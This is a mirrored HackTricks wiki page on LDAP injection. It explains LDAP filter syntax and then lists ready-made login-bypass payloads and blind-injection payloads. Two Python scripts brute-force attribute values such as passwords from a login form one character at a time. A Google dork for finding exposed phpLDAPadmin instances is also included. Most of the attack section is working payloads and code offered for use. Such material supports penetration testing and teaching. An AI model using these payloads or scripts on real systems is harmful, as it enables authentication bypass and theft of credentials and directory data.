mirror of
				https://github.com/HackTricks-wiki/hacktricks.git
				synced 2025-10-10 18:36:50 +00:00 
			
		
		
		
	
		
			
				
	
	
		
			225 lines
		
	
	
		
			6.5 KiB
		
	
	
	
		
			Markdown
		
	
	
	
	
	
			
		
		
	
	
			225 lines
		
	
	
		
			6.5 KiB
		
	
	
	
		
			Markdown
		
	
	
	
	
	
| # LDAP Injection
 | |
| 
 | |
| {{#include ../banners/hacktricks-training.md}}
 | |
| 
 | |
| ## LDAP Injection
 | |
| 
 | |
| ### **LDAP**
 | |
| 
 | |
| **If you want to know what is LDAP access the following page:**
 | |
| 
 | |
| 
 | |
| {{#ref}}
 | |
| ../network-services-pentesting/pentesting-ldap.md
 | |
| {{#endref}}
 | |
| 
 | |
| **LDAP Injection** is an attack targeting web applications that construct LDAP statements from user input. It occurs when the application **fails to properly sanitize** input, allowing attackers to **manipulate LDAP statements** through a local proxy, potentially leading to unauthorized access or data manipulation.
 | |
| 
 | |
| {{#file}}
 | |
| EN-Blackhat-Europe-2008-LDAP-Injection-Blind-LDAP-Injection.pdf
 | |
| {{#endfile}}
 | |
| 
 | |
| **Filter** = ( filtercomp )\
 | |
| **Filtercomp** = and / or / not / item\
 | |
| **And** = & filterlist\
 | |
| **Or** = |filterlist\
 | |
| **Not** = ! filter\
 | |
| **Filterlist** = 1\*filter\
 | |
| **Item**= simple / present / substring\
 | |
| **Simple** = attr filtertype assertionvalue\
 | |
| **Filtertype** = _'=' / '\~=' / '>=' / '<='_\
 | |
| **Present** = attr = \*\
 | |
| **Substring** = attr ”=” \[initial] \* \[final]\
 | |
| **Initial** = assertionvalue\
 | |
| **Final** = assertionvalue\
 | |
| **(&)** = Absolute TRUE\
 | |
| **(|)** = Absolute FALSE
 | |
| 
 | |
| For example:\
 | |
| `(&(!(objectClass=Impresoras))(uid=s*))`\
 | |
| `(&(objectClass=user)(uid=*))`
 | |
| 
 | |
| You can access to the database, and this can content information of a lot of different types.
 | |
| 
 | |
| **OpenLDAP**: If 2 filters arrive, only executes the first one.\
 | |
| **ADAM or Microsoft LDS**: With 2 filters they throw an error.\
 | |
| **SunOne Directory Server 5.0**: Execute both filters.
 | |
| 
 | |
| **It is very important to send the filter with correct syntax or an error will be thrown. It is better to send only 1 filter.**
 | |
| 
 | |
| The filter has to start with: `&` or `|`\
 | |
| Example: `(&(directory=val1)(folder=public))`
 | |
| 
 | |
| `(&(objectClass=VALUE1)(type=Epson*))`\
 | |
| `VALUE1 = *)(ObjectClass=*))(&(objectClass=void`
 | |
| 
 | |
| Then: `(&(objectClass=`**`*)(ObjectClass=*))`** will be the first filter (the one executed).
 | |
| 
 | |
| ### Login Bypass
 | |
| 
 | |
| LDAP supports several formats to store the password: clear, md5, smd5, sh1, sha, crypt. So, it could be that independently of what you insert inside the password, it is hashed.
 | |
| 
 | |
| ```bash
 | |
| user=*
 | |
| password=*
 | |
| --> (&(user=*)(password=*))
 | |
| # The asterisks are great in LDAPi
 | |
| ```
 | |
| 
 | |
| ```bash
 | |
| user=*)(&
 | |
| password=*)(&
 | |
| --> (&(user=*)(&)(password=*)(&))
 | |
| ```
 | |
| 
 | |
| ```bash
 | |
| user=*)(|(&
 | |
| pass=pwd)
 | |
| --> (&(user=*)(|(&)(pass=pwd))
 | |
| ```
 | |
| 
 | |
| ```bash
 | |
| user=*)(|(password=*
 | |
| password=test)
 | |
| --> (&(user=*)(|(password=*)(password=test))
 | |
| ```
 | |
| 
 | |
| ```bash
 | |
| user=*))%00
 | |
| pass=any
 | |
| --> (&(user=*))%00 --> Nothing more is executed
 | |
| ```
 | |
| 
 | |
| ```bash
 | |
| user=admin)(&)
 | |
| password=pwd
 | |
| --> (&(user=admin)(&))(password=pwd) #Can through an error
 | |
| ```
 | |
| 
 | |
| ```bash
 | |
| username = admin)(!(&(|
 | |
| pass = any))
 | |
| --> (&(uid= admin)(!(& (|) (webpassword=any)))) —> As (|) is FALSE then the user is admin and the password check is True.
 | |
| ```
 | |
| 
 | |
| ```bash
 | |
| username=*
 | |
| password=*)(&
 | |
| --> (&(user=*)(password=*)(&))
 | |
| ```
 | |
| 
 | |
| ```bash
 | |
| username=admin))(|(|
 | |
| password=any
 | |
| --> (&(uid=admin)) (| (|) (webpassword=any))
 | |
| ```
 | |
| 
 | |
| #### Lists
 | |
| 
 | |
| - [LDAP_FUZZ](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/LDAP%20Injection/Intruder/LDAP_FUZZ.txt)
 | |
| - [LDAP Attributes](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/LDAP%20Injection/Intruder/LDAP_attributes.txt)
 | |
| - [LDAP PosixAccount attributes](https://tldp.org/HOWTO/archived/LDAP-Implementation-HOWTO/schemas.html)
 | |
| 
 | |
| ### Blind LDAP Injection
 | |
| 
 | |
| You may force False or True responses to check if any data is returned and confirm a possible Blind LDAP Injection:
 | |
| 
 | |
| ```bash
 | |
| #This will result on True, so some information will be shown
 | |
| Payload: *)(objectClass=*))(&objectClass=void
 | |
| Final query: (&(objectClass= *)(objectClass=*))(&objectClass=void )(type=Pepi*))
 | |
| ```
 | |
| 
 | |
| ```bash
 | |
| #This will result on True, so no information will be returned or shown
 | |
| Payload: void)(objectClass=void))(&objectClass=void
 | |
| Final query: (&(objectClass= void)(objectClass=void))(&objectClass=void )(type=Pepi*))
 | |
| ```
 | |
| 
 | |
| #### Dump data
 | |
| 
 | |
| You can iterate over the ascii letters, digits and symbols:
 | |
| 
 | |
| ```bash
 | |
| (&(sn=administrator)(password=*))    : OK
 | |
| (&(sn=administrator)(password=A*))   : KO
 | |
| (&(sn=administrator)(password=B*))   : KO
 | |
| ...
 | |
| (&(sn=administrator)(password=M*))   : OK
 | |
| (&(sn=administrator)(password=MA*))  : KO
 | |
| (&(sn=administrator)(password=MB*))  : KO
 | |
| ...
 | |
| ```
 | |
| 
 | |
| ### Scripts
 | |
| 
 | |
| #### **Discover valid LDAP fields**
 | |
| 
 | |
| LDAP objects **contains by default several attributes** that could be used to **save information**. You can try to **brute-force all of them to extract that info.** You can find a list of [**default LDAP attributes here**](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/LDAP%20Injection/Intruder/LDAP_attributes.txt).
 | |
| 
 | |
| ```python
 | |
| #!/usr/bin/python3
 | |
| import requests
 | |
| import string
 | |
| from time import sleep
 | |
| import sys
 | |
| 
 | |
| proxy = { "http": "localhost:8080" }
 | |
| url = "http://10.10.10.10/login.php"
 | |
| alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;"
 | |
| 
 | |
| attributes = ["c", "cn", "co", "commonName", "dc", "facsimileTelephoneNumber", "givenName", "gn", "homePhone", "id", "jpegPhoto", "l", "mail", "mobile", "name", "o", "objectClass", "ou", "owner", "pager", "password", "sn", "st", "surname", "uid", "username", "userPassword",]
 | |
| 
 | |
| for attribute in attributes: #Extract all attributes
 | |
|     value = ""
 | |
|     finish = False
 | |
|     while not finish:
 | |
|         for char in alphabet: #In each possition test each possible printable char
 | |
|             query = f"*)({attribute}={value}{char}*"
 | |
|             data = {'login':query, 'password':'bla'}
 | |
|             r = requests.post(url, data=data, proxies=proxy)
 | |
|             sys.stdout.write(f"\r{attribute}: {value}{char}")
 | |
|             #sleep(0.5) #Avoid brute-force bans
 | |
|             if "Cannot login" in r.text:
 | |
|                 value += str(char)
 | |
|                 break
 | |
| 
 | |
|             if char == alphabet[-1]: #If last of all the chars, then, no more chars in the value
 | |
|                 finish = True
 | |
|                 print()
 | |
| ```
 | |
| 
 | |
| #### **Special Blind LDAP Injection (without "\*")**
 | |
| 
 | |
| ```python
 | |
| #!/usr/bin/python3
 | |
| 
 | |
| import requests, string
 | |
| alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;"
 | |
| 
 | |
| flag = ""
 | |
| for i in range(50):
 | |
|     print("[i] Looking for number " + str(i))
 | |
|     for char in alphabet:
 | |
|         r = requests.get("http://ctf.web??action=dir&search=admin*)(password=" + flag + char)
 | |
|         if ("TRUE CONDITION" in r.text):
 | |
|             flag += char
 | |
|             print("[+] Flag: " + flag)
 | |
|             break
 | |
| ```
 | |
| 
 | |
| ### Google Dorks
 | |
| 
 | |
| ```bash
 | |
| intitle:"phpLDAPadmin" inurl:cmd.php
 | |
| ```
 | |
| 
 | |
| ### More Payloads
 | |
| 
 | |
| 
 | |
| {{#ref}}
 | |
| https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection
 | |
| {{#endref}}
 | |
| 
 | |
| {{#include ../banners/hacktricks-training.md}}
 |